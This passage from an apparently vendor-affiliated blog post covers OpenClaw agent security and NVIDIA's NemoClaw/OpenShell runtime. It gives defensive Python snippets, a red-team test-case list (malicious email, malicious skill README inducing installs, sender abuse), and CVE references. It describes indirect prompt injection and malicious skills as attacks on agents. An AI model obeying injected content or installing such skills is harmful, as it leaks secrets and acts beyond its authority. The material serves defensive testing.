        "content_type": "email",
        "goal": "See whether the agent opens the link, forwards secrets, or calls tools",
    },
    {
        "name": "malicious_skill_readme",
        "content_type": "skill_doc",
        "goal": "See whether the agent proposes or executes install commands",
    },
    {
        "name": "shared_workspace_sender_abuse",
        "content_type": "chat_message",
        "goal": "See whether an allowed sender can induce actions beyond intended authority",
    },
]

# Placeholder loop: a real harness would feed each case to the agent and record telemetry.
for case in test_cases:
    print(f"[RUN] {case['name']} -> {case['goal']}")
```

That Python snippet is intentionally bare. The real work is what you log around it. For every test, capture the inbound content, the model’s intermediate reasoning if available, the tool calls requested, the tool calls actually executed, the outbound network attempts, the file paths touched, and the persistence artifacts created. If your telemetry cannot answer those seven questions, your agent security test is interesting theater but weak engineering. That conclusion matches the emphasis in OWASP’s monitoring guidance, Microsoft’s runtime-boundary framing, and NVIDIA’s audit-trail-centered description of OpenShell policy decisions. (OWASP Cheat Sheet Series)
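One way to make those questions enforceable is a telemetry record with one field per item in the list above. In this record, `None` means “not captured” and an empty list means “captured, nothing happened.” The `CaseTelemetry` class and its field names are hypothetical, not a standard schema.

```python
from dataclasses import dataclass, fields
from typing import Optional

@dataclass
class CaseTelemetry:
    """One record per test case; field names are illustrative, not a standard schema."""
    inbound_content: Optional[str] = None
    model_reasoning: Optional[str] = None        # only if the runtime exposes it
    tool_calls_requested: Optional[list] = None
    tool_calls_executed: Optional[list] = None
    network_attempts: Optional[list] = None
    files_touched: Optional[list] = None
    persistence_artifacts: Optional[list] = None

def missing_fields(record: CaseTelemetry) -> list[str]:
    """Names of telemetry questions this record cannot answer (None = not captured)."""
    return [f.name for f in fields(record) if getattr(record, f.name) is None]
```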

The most useful engineering pattern in 2026

The single most useful pattern emerging across these sources is reader-agent versus actor-agent separation.

Use one tightly sandboxed, low-authority runtime to ingest external content, summarize, classify, or extract safe structured artifacts. Then feed only validated output into a separate runtime that is allowed to act. This is simply a concrete implementation of least privilege, input isolation, and human-in-the-loop controls. It also maps neatly to OpenShell’s out-of-process policy model. When teams collapse everything into one clever, all-powerful claw, they create exactly the kind of monolithic failure domain that indirect prompt injection and malicious skills thrive on. (OWASP Cheat Sheet Series)
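The handoff between the two runtimes is where this pattern succeeds or fails. The minimal sketch below assumes a hypothetical JSON contract with only `intent` and `title` fields. The actor side accepts a small, typed artifact and rejects everything else, so raw external content never reaches the runtime that can act.

```python
import json
from typing import Optional

# Hypothetical contract between the reader runtime and the actor runtime.
ALLOWED_INTENTS = frozenset({"create_ticket", "label_issue"})
MAX_TITLE_LEN = 120

def validate_reader_output(raw: str) -> Optional[dict]:
    """Accept only a small, typed JSON artifact from the reader; reject everything else.

    The actor never sees the original external content, only these validated fields.
    """
    try:
        data = json.loads(raw)
    except json.JSONDecodeError:
        return None
    if not isinstance(data, dict) or set(data) != {"intent", "title"}:
        return None  # extra or missing keys are refused, not ignored
    intent, title = data["intent"], data["title"]
    if not isinstance(intent, str) or intent not in ALLOWED_INTENTS:
        return None
    if not isinstance(title, str) or len(title) > MAX_TITLE_LEN or "\n" in title:
        return None
    return {"intent": intent, "title": title}
```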

This pattern is also consistent with the practical lesson from 1Password’s benchmark. High-capability models may become very good at recognizing suspicious domains or dangerous requests, but that does not mean they will consistently refuse or sequence their actions safely. Better runtime boundaries, scoped toolsets, and explicit approval flows help close the gap between model judgment and system safety. (1Password)

Where this leaves NVIDIA’s thesis

NVIDIA’s thesis is directionally right.

OpenClaw exposed a truth that much of the industry was trying to glide past: autonomous agents are useful only when they can touch real systems, and the moment they touch real systems, runtime security stops being optional. OpenShell is a serious answer to that problem because it moves enforcement outside the agent and makes filesystem, process, network, and inference routing first-class policy concerns. On architecture alone, that is a real improvement over “just trust the agent harness.” (NVIDIA Developer)

But the strongest reading is still a measured one. NemoClaw is not the end of the OpenClaw security conversation. It is the start of a more mature phase of it. NVIDIA’s own repo says the stack is early-stage alpha. CIO’s reporting notes that researchers will inevitably begin scrutinizing the new layer for CVE-level weaknesses too. That is the right expectation. The new control plane is powerful and promising, but it is still software, and it still lives in a messy ecosystem where identity, supply chain, exposure, and human approval discipline determine whether the runtime becomes a containment layer or a false sense of control. (GitHub)

Continuous validation matters more than one-time hardening

One pattern the current literature keeps converging on is that agent security cannot be treated like a setup wizard. You do not harden once and declare victory. OpenClaw’s own docs say to run the security audit regularly, especially after changing configuration or exposing new surfaces. Microsoft says self-hosted runtimes should prioritize containment and recoverability rather than assuming prevention will hold forever. Trend Micro recommends testing unvalidated skills in controlled environments. SecurityScorecard emphasizes that adoption is outpacing hardening. These are all different ways of saying the same thing: runtime drift is inevitable. (OpenClaw)
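
Drift is the failure mode, so one cheap control is to fingerprint the configuration files that define the agent's exposure and trust boundaries. Whenever that fingerprint changes, a re-audit is forced. This is a minimal sketch. Which files to watch and how the audit is then run are deployment-specific, and the JSON baseline format here is an assumption.

```python
import hashlib
import json
from pathlib import Path


def fingerprint(paths: list[str]) -> str:
    """Stable SHA-256 over the names and contents of the watched files.

    Each entry is length-prefixed so different file layouts cannot collide,
    and a missing file is hashed as a distinct marker rather than skipped.
    """
    h = hashlib.sha256()
    for p in sorted(Path(x) for x in paths):
        name = str(p).encode()
        h.update(len(name).to_bytes(8, "big") + name)
        if p.exists():
            data = p.read_bytes()
            h.update(b"F" + len(data).to_bytes(8, "big") + data)
        else:
            h.update(b"M")
    return h.hexdigest()


def needs_reaudit(paths: list[str], baseline_file: str) -> bool:
    """True if no baseline exists yet or the watched files changed since it was recorded."""
    baseline = Path(baseline_file)
    if not baseline.exists():
        return True
    recorded = json.loads(baseline.read_text()).get("sha256")
    return recorded != fingerprint(paths)


def record_baseline(paths: list[str], baseline_file: str) -> None:
    """Store the current fingerprint; call this only after an audit has passed."""
    Path(baseline_file).write_text(json.dumps({"sha256": fingerprint(paths)}))
```

Wire `needs_reaudit` into a scheduled job or an upgrade hook. Call `record_baseline` only after the audit passes, so that an unreviewed change keeps tripping the check.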

This is where a platform like Penligent fits. Penligent positions itself as an AI-powered penetration testing platform centered on tool orchestration, proof, verification, and reporting rather than just chat-style vulnerability commentary. Its recent OpenClaw-related writing has focused on runtime validation, exposed surfaces, indirect injection, delegated authority, and repeatable security testing. That makes it relevant not as a substitute for OpenShell, but as a validation harness around an OpenClaw or NemoClaw deployment. In practical terms, that means testing that your gateway really is not exposed, your reverse proxy cannot be abused, your tool boundaries hold under hostile content, your patched versions stay patched, and your regression checks keep running after upgrades or configuration changes. (penligent.ai)
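
The first check in that list, confirming the gateway is not reachable where it should not be, can be automated as a simple regression test. Here is a minimal sketch. It assumes you run it from a vantage point outside the host, such as another subnet or an external scanner, and supply the host and port pairs yourself. Nothing here is specific to Penligent, OpenClaw, or NemoClaw.

```python
import socket


def is_reachable(host: str, port: int, timeout: float = 2.0) -> bool:
    """True if a TCP connection to host:port succeeds from where this script runs."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, timed out, or DNS failure
        return False


def exposure_findings(
    should_be_closed: list[tuple[str, int]], timeout: float = 2.0
) -> list[tuple[str, int]]:
    """Return every (host, port) that is expected to be closed but accepted a connection."""
    return [(h, p) for h, p in should_be_closed if is_reachable(h, p, timeout)]
```

An empty result only means those ports refused TCP connections from this vantage point at this moment. It says nothing about exposure through a reverse proxy or tunnel, which needs its own checks. Re-run it after every upgrade or configuration change.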

The right pairing is not “NemoClaw versus Penligent.” It is closer to containment plus validation. OpenShell can reduce blast radius inside the runtime. A validation platform can repeatedly test whether your assumptions about exposure, auth, prompt-to-action abuse, and fix verification still hold in the messy real world outside the policy file. For security teams, that is the more durable operating model. (NVIDIA Docs)

Final judgment

If you strip away the hype, nvidia openclaw security boils down to one sentence: NVIDIA recognized that autonomous agents need a real execution boundary, not just a smarter prompt.

That recognition is correct. OpenClaw’s own security model is narrow and explicit. Microsoft’s framing of identity, execution, and persistence is correct. OWASP’s emphasis on least privilege, prompt isolation, memory security, human approval, and monitoring is correct. SecurityScorecard’s exposure research is correct. Trend Micro’s malicious skill findings are correct. And NVIDIA’s answer, OpenShell, is technically important because it finally tries to enforce those realities outside the agent process instead of merely describing them. (OpenClaw)

But if you want the shortest honest conclusion, it is this: NemoClaw can make OpenClaw safer. It cannot make unsafe deployments safe by itself. It can narrow permissions, constrain egress, improve isolation, and route inference more carefully. It cannot fix bad identity design, overbroad trust boundaries, malicious skills, sloppy exposure, or the tendency of powerful agents to do the wrong thing with the right credentials. Engineers who understand that distinction will get value from this new stack. Engineers who miss it will simply build a more sophisticated version of the same old incident. (NVIDIA NIM APIs)

Further reading

NVIDIA NemoClaw overview and install page. (NVIDIA)

NVIDIA announcement of NemoClaw for the OpenClaw community, March 16, 2026. (NVIDIA Newsroom)

NVIDIA OpenShell documentation and architecture overview. (NVIDIA Docs)

NVIDIA technical blog on OpenShell and out-of-process enforcement. (NVIDIA Developer)

OpenClaw official security guidance and trust model. (OpenClaw)

Microsoft Security Blog, running OpenClaw safely through identity, isolation, and runtime risk. (Microsoft)

OWASP AI Agent Security Cheat Sheet. (OWASP Cheat Sheet Series)

OWASP LLM Prompt Injection Prevention Cheat Sheet. (OWASP Cheat Sheet Series)

SecurityScorecard research on exposed OpenClaw deployments. (SecurityScorecard)

Trend Micro research on malicious OpenClaw skills distributing Atomic macOS Stealer. (Trend Micro)

1Password SCAM benchmark on agent security failures and improvements with security guidance. (1Password)

CVE-2026-25253, gateway URL token leakage and auto-connect behavior. (NVD)

CVE-2026-24763, Docker sandbox command injection. (NVD)

CVE-2026-25475, arbitrary file read through media parsing. (NVD)

CVE-2026-28472, gateway device identity check bypass. (NVD)

CVE-2026-22179, macOS system.run allowlist bypass. (NVD)

CVE-2026-30741, request-side prompt injection RCE. (NVD)

OpenClaw Security: The Definitive Guide to Risks, Red Teaming, and Survival. (penligent.ai)

OpenClaw Security, What It Takes to Run an AI Agent Without Losing Control. (penligent.ai)

OpenClaw AI Security Test — How to Red-Team a High-Privilege Agent Before It Red-Team You. (penligent.ai)

Pentest AI Tools in 2026 — What Actually Works, What Breaks. (penligent.ai)

Penligent homepage. (penligent.ai)